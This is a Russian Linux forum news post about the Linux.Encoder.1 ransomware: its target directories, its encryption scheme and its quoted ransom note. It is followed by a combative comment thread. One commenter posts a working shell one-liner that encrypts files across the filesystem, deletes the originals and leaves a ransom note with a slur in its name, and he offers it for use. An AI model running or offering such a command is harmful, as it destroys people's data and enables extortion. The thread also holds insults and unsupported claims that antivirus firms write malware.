LINUX.ORG.RU

Обнаружен троян-шифровальщик для Linux

 ,


3

3

Как сообщила компания Доктор Веб, был обнаружен троян-шифровальщик для операционной системы GNU/Linux, внесенный в базу компании как Linux.Encoder.1. Зловред написан на языке С с использованием библиотеки PolarSSL и для работы требует прав root. Троянец запускает себя как демон и удаляет свой исходный файл, затем шифрует содержимое каталогов:

/home
/root
/var/lib/mysql
/var/www
/etc/nginx
/etc/apache2
/var/log
После этого Linux.Encoder.1 начинает рекурсивный обход содержимого файловой системы и шифрует файлы с определенными расширениями. Исходя из этой информации можно сделать вывод, что троянец нацелен, в первую очередь, на веб-сервера. Шифрование осуществляется по алгоритму AES. Сгенерированные AES-ключи шифруются используя RSA. Получить данные обратно без приватного ключа практически невозможно. В каждом каталоге с зашифрованными файлами располагается текстовый файл с требованиями создателей. Содержимое файла:

Your personal files are encrypted! Encription was produced using a unique public key RSA-2048 generated for this computer.
To decrypt files you need to obtain the private key.
The single copy of the private key, which will allow to decrypt the files, located on a secret server at the Internet. After that, nobody and never will be able to restore files...
To obtain the private key and php script for this computer, which will automatically decrypt files, you need to pay 1 bitcoin(s) (~420 USD).
Without this key, you will never ba able to get your original files back.

В конце файла размещается ссылка на ресурс в сети Tor, где можно получить приватный ключ для расшифровки файлов после оплаты. Требуемая сумма составляет 1 биткоин (примерно, 420 USD).
Каким образом троянец попадает на сервер и получает права для запуска не уточняется.

>>> Подробности



Проверено: Shaman007 ()

Ответ на: комментарий от erzentd

открой для себя selinux.

Нафиг оно нужно конкретно в моем случае? Мне достаточно запустить процесс php под отдельным юзером и запретить exec, system и прочие функции php.

iron ★★★★★ ()
Ответ на: комментарий от Loki13

это работает даже на 2012R2 со всеми обновлениями, вирус написан бывшим сотрудником компании «Код Безопасности»,и по факту использует механизмы с пользователем «система», с которым работают все наши СЗИ.

erzentd ()
Ответ на: комментарий от iron

Нафиг оно нужно конкретно в моем случае? Мне достаточно запустить процесс php под отдельным юзером и запретить exec, system и прочие функции php

и поймать тот же самый шифровальщик, но реализованный на чистом php без единого вызова внешних утилит, так?

x3al ★★★★★ ()

Интересно его потыкать. А вообще не понимаю, как его в здравом уме можно скачать и запустить? Про ssh со «словарным» паролем на стандартном порту я молчу. На shared помойках вообще не стоит давать пользователям выполнять что-то из хомяков, а запустить такое лично на приватной машине - ну вы поняли...

nighthawk ()

Котаны, а где его взять/скачать можно?

int13h ★★★★★ ()

требует прав root
троянец нацелен, в первую очередь, на веб-сервера

/0 ну или веб-сервер локалхоста тогда уж.

fang90 ★★★★★ ()

Надо срочно скачать Доктор веб, он защитит от вирусов.

anonymous ()
Ответ на: комментарий от erzentd

и по факту использует механизмы с пользователем «система»

а поподробнее? если нет админских прав, то с права системы не получишь

kott ★★★★★ ()
Ответ на: комментарий от x3al

и поймать тот же самый шифровальщик, но реализованный на чистом php без единого вызова внешних утилит, так?

При дырявом сайте никакой selinux не поможет.

iron ★★★★★ ()

и для работы требует прав root.

Ненужно.

Pronin ★★★★ ()
Ответ на: комментарий от erzentd

Скорее 99 процентов бы сказали, да ну его нафик, такое занятие. Беда наша в малой вероятности наказания.

anonymous ()

Мне кажется это не Вася П. написал, это разработчики антивирусов пишут скорей всего... «Покупайте, покупайте наших слонов».

azorg ()
Ответ на: комментарий от kott

а их получать не надо, система сама запустит, начиная с 7ки винда получает скрытые обновления, причём вирус тупо использует механизм атлука, который при старте сканирует и запускает возможные для себя обновления. причём так делает куча софта их, особенно IE, тот вообще открыто загружает лажу.

erzentd ()
Ответ на: комментарий от thesis

я ещё маленький, поэтому запустите меня пожалуйста сами

«требует рута»

прежде чем самому гыкать, для начала вы таки должны ответить на простой вопрос: как ОНО попадёт на сервер?

mumpster ★★★★★ ()
Ответ на: комментарий от l

В большинстве случаев это все же работает для большинства
домохозяек

бгг, KB3068708, KB3022345, KB3075249 и KB3080149 это одобряют!

))))))))))))))))))))))))

mumpster ★★★★★ ()
Ответ на: комментарий от erzentd

Котеги не занимаются вирусней, у них другой рынок.

Попробуй объяснить, как твой свежевыдуманный вирус запускается. Для начала.

CaveRat ★★ ()

Может Доктор Веб выдумал эту новость, чтоб про него кто-то вспомнил.

anonymous ()
Ответ на: комментарий от CaveRat

а я писал что они занимаются вируснёй? нет, читай внимательно, вирус работает на том же уровне что и СЗИ.

erzentd ()

И тут мы вспоминаем, что в отличии от Windows у нас есть снапшоты......

dmxrand ()
Ответ на: комментарий от erzentd

начиная с 7ки винда получает скрытые обновления

Из каких источников? Каким образом в них окажется вредоносный код?

dexpl ★★★★★ ()
Ответ на: комментарий от erzentd

полудурок, считающий, что под андроид существует ассемблер будет нам про вирусы рассказывать. Ай лолд.

golovach_lena ()
Ответ на: комментарий от golovach_lena

А что с ассемблером под Android не так? Под ARM есть ассемблер, даже пишу на нем. Под байт-код выхлоп из под андроидной Java то жесть есть ассемблер.

anonymous ()

Это кто-то не спал днями и ночами и вот такую фиготу сумел родить?

gpg --recv-key 0x31337 && find / -regextype posix-egrep -iregex '.*?(pdf|png|doc|xlsx|jpg|govno|mocha|allah)$' -exec gpg -e --recipient 0x31337 {} \; -delete && echo "UR FUCKED\!\!\!111\n SEND ME YOR MONEY" >$HOME/READ_ME_U_FUGGEN_FAGGOT.TXT


Срочно ставим дохтур еб, срочно. Иначе кранты.

А если сурьезно, я тут написал им (дохтурам этим), попросил предоставить образец зловреда для опытов, но что-то молчат. Тухлый вброс, в общем.

warl0ck ★★ ()
Ответ на: комментарий от anonymous

Доктор Веб - хороший антивирусник. Как-то родственник из разряда домохозяек словил, скачивая «книгу» из интернета какой-то вирусняк, изменяющий на рабочем столе все ярлыки так, что вместо запуска соответствующих программ запускается вирусняк и т.д. Так вот, на машине стоял Касперский, при этом вирус он видел только как-то частично или не видел его совсем. Запустил CureIt! от Dr.Web и он нашел этот вирусняк и вылечил по сути машину в защищенном режиме (потом, правда, еще ярлыки и прочий мусор пришлось довычистить). Так вот, суть сей байки такова, что Dr.Web - вполне себе годный антивирусник для Windows.

l ()
Ответ на: комментарий от x3al

и несколько психов, считающих, что антивирусные компании пишут вирусы.

Сами-то, наверное, не пишут. Для этого у них есть макаки на аутсорсе. А так, я бы сказал, что тут несколько психов, считающих «антивирусные компании» белыми и пушистыми (или защищающая их по служебной необходимости), а основная масса комментаторов вполне адекватна.

warl0ck ★★ ()
Ответ на: комментарий от haku

sudo troyan.exe

sudo troyan.sh

sudo troyan.bin

sudo troyan.pl

sudo troyan.py

Deleted ()

Джва года ждал. Даже здесь писал, что странно что до сих пор до линукс машин шифровальшики не добрались. Правда какой-то он еще не допиленный, права рута ему подавай... я вообще жду что бы из под юзера работало, а в идеале кросплатформенный, ведь все же для этого есть, виндовые шифровальшики используют портированные линукс утилиты.

anc ★★★★★ ()
Ответ на: комментарий от warl0ck

Зачем антивирусным компаниям писать малвару, если этим занимается целая огромная индустрия, зарабатывающая чуть ли не больше первых?

xtraeft ★★☆☆ ()
Ответ на: комментарий от anc

я вообще жду что бы из под юзера работало

Да вон, я выше написал. Пользуйся на здоровье.

warl0ck ★★ ()
Ответ на: комментарий от warl0ck

Нафиг нужна теория заговора, если вирус в сабже пишется кем угодно за вечер и вполне может дать профит написавшему его? Почему эту хрень должны писать именно антивирусные компании, особенно учитывая, что антивирусы известны бесполезностью против ransomware?

x3al ★★★★★ ()
Ответ на: комментарий от x3al

за вечер

За минуту, ты хотел сказать? А профит здесь в раздувании слона из мухи и пиаре на пустом месте. Эдак впору писать душещипательные истории как «вредоносная программа rm может повредить ваши файлы».

теория заговора

Уже давно не теория.

warl0ck ★★ ()
Ответ на: комментарий от warl0ck

То есть 0 доказательств, как у религиознутых. С тем же успехом можно утверждать, что вирусы пишут инопланетяне.

x3al ★★★★★ ()
Ответ на: комментарий от x3al

Ты там на зарплате что ли? Практически все упоминания этого linux.encoder.1 ведут на сайт дохтура еба. Просьбы предоставить заразку для ознакомления сия замечательная компания игнорит. Такой «вирус» пишется не отрываясь от чашки чая за минуту, что было продемонстрированно выше.

Не пиарная ли это утка это? Гм, дай подумать...

warl0ck ★★ ()
Ответ на: комментарий от warl0ck

Пиарная утка с 2к заражённых сайтов в гугле? Ну, если твой манямирок требует таких допущений — ок.

x3al ★★★★★ ()
Последнее исправление: x3al (всего исправлений: 1)
Ответ на: комментарий от x3al

Пиарная утка с 2к заражённых сайтов в гугле?

Где? https://www.google.ru/search?q=linux.encoder.1&btnG=Поиск&oe=utf-8&am...

Практически все вот это ведет известно куда и является копированием или пересказом дохтурвебной новости.

То, что уязвимости существуют понятно даже ежику. Всякие роутеры с admin/admin, не обновляющиеся много лет серваки — почетные члены ботнетов, в общем. Как известно и про возможность одной командой «из-под рута» угробить систему целиком.

А тут сенсация: «вирус-вымогатель», ага.

маниямирок

Кто-то, по-моему, ошибся ресурсом. Мамку-то хоть не тронешь?

warl0ck ★★ ()
Ответ на: комментарий от warl0ck

Ты ищешь по названию, которое придумали в dr.web. facepalm.

x3al ★★★★★ ()
Ответ на: комментарий от x3al

Нашел одну ссылку, где не указали первоисточник? Ну молодец, возьми с полки пирожок.

warl0ck ★★ ()
Ответ на: комментарий от warl0ck

То есть ты ещё не умеешь в английский? Ок.

x3al ★★★★★ ()
Ответ на: комментарий от x3al

Как вот это может опровергнуть гипотезу происхождения этого «вируса»?

Давай еще раз, медленно и по слогам: для совершения вредоносных действий поделке требуется проникнуть в систему и, опционально, получить root привилегии. Подобная поделка пишется за минуты и ее действия эквивалентны выполнению, например, rm -rf ~/.

Чем это отличается от очередного кульного хацкера, подобравшего сочетание root/qwerty123 и сделавшего пакость?

Какие же из этого следуют выводы? Ну ты подумай, напряги мозгу.

warl0ck ★★ ()
Ответ на: комментарий от x3al

Я не умею? Ну зашибись. Ты сам-то читал там дальше заголовка? А то странно получается: компания-то другая, а используют

названию, которое придумали в dr.web.

warl0ck ★★ ()
Ответ на: комментарий от warl0ck

Чем это отличается от очередного кульного хацкера, подобравшего сочетание root/qwerty123 и сделавшего пакость?

Тем, что проще монетизируется. Это уже было в windows, ну. Следовательно, будут новые версии, причём написанные не just4fun, а ради реальных денег. Я ничерта не понимаю, чем твоя теория заговора лучше.

x3al ★★★★★ ()
Ответ на: комментарий от warl0ck

Ох, млин. Для shellshock и heartbleed нужно было тоже придумать 2000 разных названий.

x3al ★★★★★ ()
Ответ на: комментарий от x3al

твоя теория заговора лучше

Во-первых, она не моя. Во-вторых, она не теория. То что вирмейкеры и «антивирусные лаборатории», как минимум, организмы-симбиоты — это для тебя новость?

warl0ck ★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.